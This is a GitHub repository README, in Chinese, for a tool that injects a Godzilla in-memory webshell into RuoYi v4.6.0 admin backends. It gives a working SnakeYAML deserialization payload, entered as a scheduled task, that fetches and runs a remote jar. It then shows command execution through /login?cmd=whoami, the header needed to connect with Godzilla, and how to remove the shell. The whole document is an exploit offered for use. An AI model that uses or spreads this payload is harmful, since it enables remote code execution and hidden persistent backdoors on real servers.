Skip to content

M0untainShley/yaml-payload-for-ruoyi-godzilla

Repository files navigation

yaml-payload-for-ruoyi

测试环境

ruoyi v4.6.0

用法

使用 mvn clean package 打包生成 jar,或者直接下载 release 中的 jar,放在 web 路径下

web

ruoyi 后台创建定时任务

定时任务

payload

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:12346/yaml-payload-for-ruoyi-1.0-SNAPSHOT.jar"] 
  ]]
]')

执行定时任务

定时任务

web 服务器接受到请求

定时任务

执行命令 /login?cmd=whoami

定时任务

哥斯拉连接,需要配置请求头 X-Cmd-Ruoyi: 任意字符串

header

连接地址 /login?cmd=1,有 cmd 参数即可

godzilla

删除内存马 /login?cmd=delete

参考

  1. https://xz.aliyun.com/t/10651
  2. https://github.com/lz2y/yaml-payload-for-ruoyi

About

ruoyi 后台定时任务注入哥斯拉内存马

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages